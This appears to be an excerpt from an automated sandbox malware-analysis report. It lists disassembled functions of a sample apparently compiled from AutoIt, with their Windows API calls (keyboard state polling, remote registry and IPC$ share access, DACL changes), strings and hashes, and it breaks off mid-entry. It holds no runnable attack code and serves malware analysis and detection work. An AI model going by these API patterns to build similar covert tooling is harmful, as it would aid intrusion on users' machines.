                                      • GetLengthSid.ADVAPI32(?), ref: 0096A986
                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0096A995
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0096A99C
                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0096A9BD
                                      • CopySid.ADVAPI32(00000000), ref: 0096A9C4
                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0096A9F5
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0096AA1B
                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0096AA2F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                      • String ID:
                                      • API String ID: 2347767575-0
                                      • Opcode ID: 7e9c782e262db57e5e1b5892daf1e362e2c290c48274f4a76a64c856c591d097
                                      • Instruction ID: 60dc122ead080456e79fbd33993e6dc03297ed78154131db680999d745bc1e04
                                      • Opcode Fuzzy Hash: 7e9c782e262db57e5e1b5892daf1e362e2c290c48274f4a76a64c856c591d097
                                      • Instruction Fuzzy Hash: 5E515D7190020AAFDF00DFA4DD85AEEBB7AFF04310F14822AE811E6291D7359A05DF61
                                      Function 0097CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2889450990-2391861430
                                      • Opcode ID: 96bab14a3d9cbd05c7ac987fb297a220d91a957fb536fb86c1dde28a91732ea1
                                      • Instruction ID: 82a9fe094057ebada781044b7991afa2bc6107b427097cc86f2b68bab18a3fb5
                                      • Opcode Fuzzy Hash: 96bab14a3d9cbd05c7ac987fb297a220d91a957fb536fb86c1dde28a91732ea1
                                      • Instruction Fuzzy Hash: 97514AB2900509BBCB15EBE0CD46FEEB778AF88344F108169B505721A2EB316F59DF61
                                      Function 0097CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LoadString__swprintf_wprintf
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2889450990-3420473620
                                      • Opcode ID: 7359c78bcacf6135bb15a0475f7788cb6593e733cfdb5f735e0187d3fae8210f
                                      • Instruction ID: 0b543116a9a2716576a46222cf639ed8e049d25e495308f653fc98030b837fe8
                                      • Opcode Fuzzy Hash: 7359c78bcacf6135bb15a0475f7788cb6593e733cfdb5f735e0187d3fae8210f
                                      • Instruction Fuzzy Hash: 07519F72900509BACB15EBE0DD46FEEB778AF48344F104065B50972092EB316F59DF61
                                      Function 009755BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 009755D7
                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00975664
                                      • GetMenuItemCount.USER32(009F1708), ref: 009756ED
                                      • DeleteMenu.USER32(009F1708,00000005,00000000,000000F5,?,?), ref: 0097577D
                                      • DeleteMenu.USER32(009F1708,00000004,00000000), ref: 00975785
                                      • DeleteMenu.USER32(009F1708,00000006,00000000), ref: 0097578D
                                      • DeleteMenu.USER32(009F1708,00000003,00000000), ref: 00975795
                                      • GetMenuItemCount.USER32(009F1708), ref: 0097579D
                                      • SetMenuItemInfoW.USER32(009F1708,00000004,00000000,00000030), ref: 009757D3
                                      • GetCursorPos.USER32(?), ref: 009757DD
                                      • SetForegroundWindow.USER32(00000000), ref: 009757E6
                                      • TrackPopupMenuEx.USER32(009F1708,00000000,?,00000000,00000000,00000000), ref: 009757F9
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00975805
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                      • String ID:
                                      • API String ID: 3993528054-0
                                      • Opcode ID: 84e1c3cccda8db0c635f85cfe4b8f362d086346920732c3f1a5583fd72005a58
                                      • Instruction ID: 83e394ed173cb656c71e22eb10c42faffded33ac27b53210fdd605080fbafc8b
                                      • Opcode Fuzzy Hash: 84e1c3cccda8db0c635f85cfe4b8f362d086346920732c3f1a5583fd72005a58
                                      • Instruction Fuzzy Hash: D8711232645A05BFEB649B14CC49FAABF69FF40368F258209F51CAA1D1D7F16C10DB90
                                      Function 0096A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 0096A1DC
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0096A211
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0096A22D
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0096A249
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0096A273
                                      • CLSIDFromString.COMBASE(?,?), ref: 0096A29B
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0096A2A6
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0096A2AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 1687751970-22481851
                                      • Opcode ID: 8f344dbdad03b03130575f54d6a806c2b56e0efc0307802ce94e4c9eae51efd2
                                      • Instruction ID: 475dee9714308b0304e74e7a46b8cf0ac6957a186d9b5e1716711de2f484af91
                                      • Opcode Fuzzy Hash: 8f344dbdad03b03130575f54d6a806c2b56e0efc0307802ce94e4c9eae51efd2
                                      • Instruction Fuzzy Hash: 4541E576C15229ABDB21EBA4DC95EEDB7B8FF48310F00412AE911B3161EB709E05DF50
                                      Function 009725B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009A36F4,00000010,?,Bad directive syntax error,009CDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009725D6
                                      • LoadStringW.USER32(00000000,?,009A36F4,00000010), ref: 009725DD
                                      • _wprintf.LIBCMT ref: 00972610
                                      • __swprintf.LIBCMT ref: 00972632
                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009726A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 1080873982-4153970271
                                      • Opcode ID: 713149bcb286fe9d9b5e75322db5c334f40b9a4d75d5a5b2beeda7f4ffd947bc
                                      • Instruction ID: 3592850f82411b058d9f7f8ed96e62a378d59a30f096c0d6327bbc57917ddf0b
                                      • Opcode Fuzzy Hash: 713149bcb286fe9d9b5e75322db5c334f40b9a4d75d5a5b2beeda7f4ffd947bc
                                      • Instruction Fuzzy Hash: D4215C7281021AAFCF12EB90CC4AFEE7B79BF58308F044456F515660A2EB71AA18DF50
                                      Function 00977AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00977B42
                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00977B58
                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00977B69
                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00977B7B
                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00977B8C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: SendString
                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                      • API String ID: 890592661-1007645807
                                      • Opcode ID: 91fffc0bce5a6ccb359d15653d43d3b18c7c5abc66a1533a303eb9f6c5662472
                                      • Instruction ID: 955202c296af5fdadcd72eb748e2667ef7b4aebe72e03ef54444ec1b23d7ec5f
                                      • Opcode Fuzzy Hash: 91fffc0bce5a6ccb359d15653d43d3b18c7c5abc66a1533a303eb9f6c5662472
                                      • Instruction Fuzzy Hash: BC1194E165029979D721B7A2CC4AEFFBBBCEBD1B14F0045197415A30D1EE705E45CAB0
                                      Function 0097778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • timeGetTime.WINMM ref: 00977794
                                        • Part of subcall function 0094DC38: timeGetTime.WINMM(?,7694B400,009A58AB), ref: 0094DC3C
                                      • Sleep.KERNEL32(0000000A), ref: 009777C0
                                      • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009777E4
                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00977806
                                      • SetActiveWindow.USER32 ref: 00977825
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00977833
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00977852
                                      • Sleep.KERNEL32(000000FA), ref: 0097785D
                                      • IsWindow.USER32 ref: 00977869
                                      • EndDialog.USER32(00000000), ref: 0097787A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: 21dbe8a329d462ca801bb1170ed0c4adde6525025ba53066804b4348590d7fa8
                                      • Instruction ID: f8e09825f3adc011e38fbeb4f5746ba08657b49f145b014ef678c5016b98ca2a
                                      • Opcode Fuzzy Hash: 21dbe8a329d462ca801bb1170ed0c4adde6525025ba53066804b4348590d7fa8
                                      • Instruction Fuzzy Hash: 7C215EB222D205BFE7159BA0EC89B7A7F69FB44358F408124F51982166EBA94D00EA25
                                      Function 009802EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0093936C: __swprintf.LIBCMT ref: 009393AB
                                        • Part of subcall function 0093936C: __itow.LIBCMT ref: 009393DF
                                      • CoInitialize.OLE32(00000000), ref: 0098034B
                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009803DE
                                      • SHGetDesktopFolder.SHELL32(?), ref: 009803F2
                                      • CoCreateInstance.COMBASE(009BDA8C,00000000,00000001,009E3CF8,?), ref: 0098043E
                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009804AD
                                      • CoTaskMemFree.COMBASE(?), ref: 00980505
                                      • _memset.LIBCMT ref: 00980542
                                      • SHBrowseForFolderW.SHELL32(?), ref: 0098057E
                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009805A1
                                      • CoTaskMemFree.COMBASE(00000000), ref: 009805A8
                                      • CoTaskMemFree.COMBASE(00000000), ref: 009805DF
                                      • CoUninitialize.COMBASE ref: 009805E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                      • String ID:
                                      • API String ID: 1246142700-0
                                      • Opcode ID: 0fc0d1be056c21c9af70dd6f10e217a59b7a899c449eb0ddcb1f784331032a8c
                                      • Instruction ID: 3be617254ba92ca40e5992a33fb43d609b9adc2ea2d2fae09b24d7eb8ed025d1
                                      • Opcode Fuzzy Hash: 0fc0d1be056c21c9af70dd6f10e217a59b7a899c449eb0ddcb1f784331032a8c
                                      • Instruction Fuzzy Hash: 7BB1C975A00109AFDB04DFA5C889EAEBBB9EF88314F148469F809EB251D770EE45CF50
                                      Function 00972E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00972ED6
                                      • SetKeyboardState.USER32(?), ref: 00972F41
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00972F61
                                      • GetKeyState.USER32(000000A0), ref: 00972F78
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00972FA7
                                      • GetKeyState.USER32(000000A1), ref: 00972FB8
                                      • GetAsyncKeyState.USER32(00000011), ref: 00972FE4
                                      • GetKeyState.USER32(00000011), ref: 00972FF2
                                      • GetAsyncKeyState.USER32(00000012), ref: 0097301B
                                      • GetKeyState.USER32(00000012), ref: 00973029
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00973052
                                      • GetKeyState.USER32(0000005B), ref: 00973060
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 26cdcbb48fba21c6198f3ef5326d6dd36516d84c579dfc5e975e39cfd756d2ba
                                      • Instruction ID: 9de88c4b594ca6ba85e1325b2e88eff00617611a6836e28b3c6a83df7b4f4737
                                      • Opcode Fuzzy Hash: 26cdcbb48fba21c6198f3ef5326d6dd36516d84c579dfc5e975e39cfd756d2ba
                                      • Instruction Fuzzy Hash: 5E51EA2291878469FB35EBB48811BEABFF85F11340F08C59DD5CA561C2DB549B8CC762
                                      Function 0096ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 0096ED1E
                                      • GetWindowRect.USER32(00000000,?), ref: 0096ED30
                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0096ED8E
                                      • GetDlgItem.USER32(?,00000002), ref: 0096ED99
                                      • GetWindowRect.USER32(00000000,?), ref: 0096EDAB
                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0096EE01
                                      • GetDlgItem.USER32(?,000003E9), ref: 0096EE0F
                                      • GetWindowRect.USER32(00000000,?), ref: 0096EE20
                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0096EE63
                                      • GetDlgItem.USER32(?,000003EA), ref: 0096EE71
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0096EE8E
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0096EE9B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 7cc38d97496cf5b8a285dfd9682b2ce9898486a67da9331d5fbc044bda7a2983
                                      • Instruction ID: 52595ba95ffbcfdc2c6a867e424ee67bf6be12d0360ab1427bf21749bf0e616b
                                      • Opcode Fuzzy Hash: 7cc38d97496cf5b8a285dfd9682b2ce9898486a67da9331d5fbc044bda7a2983
                                      • Instruction Fuzzy Hash: 7C511F75B10205EFDB18CF69DD95AAEBBBAEB88710F148229F519D7290E7709D048B10
                                      Function 0094B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      • GetSysColor.USER32(0000000F), ref: 0094B438
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: 6c6cc39a197375435e3889bb7feb318d464180334c1e61258dd5fc162b1b359e
                                      • Instruction ID: ba59616d3d86539df81493ae2685820eb261572523259d9dcc7c9840366ff7ce
                                      • Opcode Fuzzy Hash: 6c6cc39a197375435e3889bb7feb318d464180334c1e61258dd5fc162b1b359e
                                      • Instruction Fuzzy Hash: 5441CF34009100AFDB245F28D889FB93B6AAB06731F184761FD668A1F6D730CD42EB61
                                      Function 0097690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                      • String ID:
                                      • API String ID: 136442275-0
                                      • Opcode ID: c9bdab394e75247884217d607a877c8802f1185043b65c8be8200bab3a2517b2
